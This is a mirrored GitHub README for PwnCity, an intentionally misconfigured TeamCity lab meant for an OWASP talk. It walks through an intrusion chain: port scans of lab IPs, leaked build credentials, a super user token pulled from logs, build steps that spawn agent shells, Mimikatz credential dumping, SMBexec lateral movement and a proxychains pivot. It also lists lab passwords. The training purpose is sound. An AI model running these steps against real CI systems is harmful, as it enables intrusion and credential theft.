Giters

d0n601 / PwnCity

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

PwnCity

An insecurely configured TeamCity continuous integration environment.
Work in progress: Deployment code coming soon eventually . rafal-urbanski-shot-08

Demo

There may be more than one path through PwnCity, but this is the one I'll be presenting on Feb 24th at the OWASP Sacramento Chapter meeting.
Note: Operational security is largely ignored here since this is a demo.

Initial Access

  1. Scan the IP to discover SSH and TeamCity nmap -Pn -p- 52.234.0.18.
    • Note: It won't respond to ICMP, so nmap 52.234.0.18 makes it seem dead.
    • Note: If you only scan the top 1000 TCP ports, you miss TeamCity nmap -Pn 52.234.0.18. portscan
  2. Browse to the TeamCity URL http://52.234.0.18:8111. teamcitylogin
  3. Navigate to http://52.234.0.18:8111/registerUser.html create a new user bob, password bobhacks?.
    bobregister
  4. As bob navigate to Projects > SimpleMavenSample > Build > Settings
  • See that Parameters contains credentials. leakcreds
  1. See if credentials are reused for ssh dev@168.62.29.0, and ssh in as low privileged user. sshin

From the Foothold

We could tunnel from our initial foothold. Knowing that RDP is open on two build agents would allow us to attempt to authenticate via the creds we've found...but that's not as fun.

  1. Explore the TeamCity server a bit and check out the upser user token cat /home/dev/TeamCity/TeamCity/logs/teamcity-server.log | grep "Super user".
    sutoken
  2. Now login as the Super User! superlogin
  3. Create new Project PwnAgent via Administration > Projects > Create project, and get a shell on the build agents. createproject buildsteps
  4. Edit the build step so that it executes Always, even if build stop command was issues, and modify the following:
    • Command executable: cmd.exe
    • Command parameters: /c %system.teamcity.build.checkoutDir%/launcher.bat
    • Once you can see how these work, you understand how code execution works here, and can modify it to do what you like. build_step
    • Alternatively, you can avoid using files in the repo, leaving it blank. All code can be shoved into a build step.
      alternative
  5. Select the ... next to Run on the menu, and then on the desired agent you're targeting. If all goes well you'll have an agent call back.
    run agentcallback
  6. Run a port scan via powershell/situational_awareness/network/portscan module. Discover that 10.0.0.7 has 3389,445,139,135 all open. portscan
  7. Run Mimikatz to dump login creds and get bruno's password.
  8. Run powershell/lateral_movement/invoke_smbexec to get beacon on Bruno-PC via NTML hash. smbexec
  9. Loot Bruno's PC.

Attack Infrastructure

  • Kali Linux: VM on operator machine.
  • Ubuntu 20.04LTS: Empire Server

PwnCity Lab

  • Ubuntu 20.04 TeamCity
  • Windows 10: BuildAgent01
  • Windows 7: BuildAgent02
  • Windows 10: Bruno-PC

Creds

Credentials chosen from rockyou.txt.

  • bruno:AMOTEbruno84 (Windows)
  • dev:Roblerino1995 (Windows/Linux)
  • admin:aut0magic (TeamCity)

To Do

  1. Deploy with Terraform.
  2. Install things with Ansible.
  3. CLI variable to tune up or down defenses (kind of like a diffuculty level)
  4. TBD

Defenses

Endpoint Security

PwnAgent01 has Microsoft Defender enabled. Although it's certainly still possible to defeat this, the malicious build step we demonstrated will be blocked.
blocked0

blocked

bruno_edr

Administrative Notes

This section is just a collection of snippets that were useful when administering the lab environment.

RDP into Windows Hosts

  1. From Kali, dynamic port forward on TeamCity host to access local resources ssh -D 9050 dev@52.234.0.18.
  2. RDP via Proxychains with proxychains4 xfreerdp /u:dev /v:10.0.0.6:3389.

References

  1. TeamCity Hardening Guide
  2. TeamCity SuperUser
  3. Pentest TeamCity
  4. PwnCity Build Agent

About